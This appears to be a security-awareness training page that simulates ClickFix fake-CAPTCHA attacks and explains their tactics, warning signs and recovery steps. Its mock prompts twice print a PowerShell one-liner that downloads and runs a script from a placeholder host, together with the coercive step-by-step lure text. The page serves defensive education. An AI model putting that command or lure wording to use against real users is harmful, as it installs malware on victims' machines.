ClickFix Attack Educator

Simulator & Resources

Interactive awareness training that shows how ClickFix attacks work and how to protect yourself, as well as examples of how attacks could look in real life.

What is ClickFix?

ClickFix is a malware delivery technique that mimics CAPTCHA checks and asks users to run "verification codes" on their devices to install malware.

Recognize the script before it runs

These prompts echo the persuasion tactics attackers rely on → urgent “security checks” that demand you open a run dialog or terminal and execute their command. If any site asks you to follow steps like these, pause immediately and verify the request with a trusted source before doing anything else.

Manual verification required

Trigger: Browser challenge failed automated checks

Ray ID · windows

Additional human verification required

Cloudflare Bot Management flagged anomalous interaction

Complete the manual verification

1
Open administrator terminal
Press Windows Key + R to open the Run dialog.
2
Initialize security validation
Type powershell and press Ctrl + Shift + Enter to run as administrator.
3
Run browser integrity check
Paste the security certification code below and press Enter.

Security diagnostic code

powershell -ep bypass -c "iex(iwr 'https://example.com/payload.ps1' -useb)"

Copied automatically — paste into your shell and press enter within 5 minutes.

security-check@portal

Manual step required

Security follow-up

Our automated verification cannot confirm your browser integrity. Follow the steps below to restore access.

Run system diagnostic tool

Step 1

Press Windows Key + R to open the Run dialog.

Step 2

Type powershell and press Ctrl + Shift + Enter to run as administrator.

Step 3

Paste the security certification code below and press Enter.

System diagnostic code

powershell -ep bypass -c "iex(iwr 'https://example.com/payload.ps1' -useb)"

Command copied to clipboard automatically — paste immediately to avoid account lockdown.

Cloudflare Security

Classic security check

Mimics legitimate Cloudflare security verification with fake CAPTCHA and modal popup.

Most Common

Windows 11 Download

Software download trap

Fake Microsoft download page that requires "authentication" to proceed with downloads.

Software Scam

Crypto Exchange

Financial platform

Fake cryptocurrency exchange login with security verification that requests commands.

Financial Scam

Understand ClickFix Malware Delivery

Familiarize yourself with how attackers stage these scams, the psychological hooks they use, and the warning signs that separate a legitimate prompt from a ClickFix attack.

How attackers weaponize ClickFix

Clone trusted flows. Cloudflare, Microsoft, banking and crypto portals are copied down to the pixel to gain instant trust.
Embed real widgets. Genuine CAPTCHA or Turnstile challenges soften you up before the malicious “manual verification” pivot.
Pre-load the payload. Copy-to-clipboard tricks ensure the attacker's command is ready to paste.
Insist on terminal execution. Running their script is the final step that provides full access.

Why targets still comply

Urgency & fear. “Access will be blocked in 5 minutes” short-circuits calm judgment.
Interface familiarity. Pixel-perfect replicas convince people they are still within the trusted brand.
Legitimacy signals. Privacy statements, terms links, and TLS locks tell victims “this is official.”
Guided steps. Coaching through keyboard shortcuts removes uncertainty for non-technical users.

Red flags to watch for

CAPTCHA success followed immediately by terminal instructions.
Verification commands referencing unknown domains or IPs.
Shortcut coaching (Cmd+Shift+V, Windows+R) forcing rapid copy/paste actions.
“Support” language that discourages you from checking with colleagues or IT.

Protection habits

Validate the domain and certificate before trusting any “security” prompt.
Confirm with security or IT before executing commands you didn't author.
Refuse to paste terminal commands straight from the clipboard.
Open critical services via bookmarks rather than in-page prompts.
Scan commands for downloaders (`curl`, `wget`, PowerShell `IEX`) before hitting enter.

If you suspect ClickFix mid-flow

Reach out to your help desk or a trusted security contact with screenshots and the suspicious URL.
Clear the clipboard, close the tab, and warn teammates before anyone else pastes the payload.
If commands executed, disconnect from the network and begin your incident response runbook.

Recommended deep dives

Ran a payload already?

Access the recovery checklist for both corporate environments and solo users to limit damage and rebuild safely.

Training Objective

These demonstrations help you practice spotting ClickFix tells and stopping before executing untrusted commands. Everything here is safe, but the flow mirrors real attacks so you can build instincts in a controlled environment.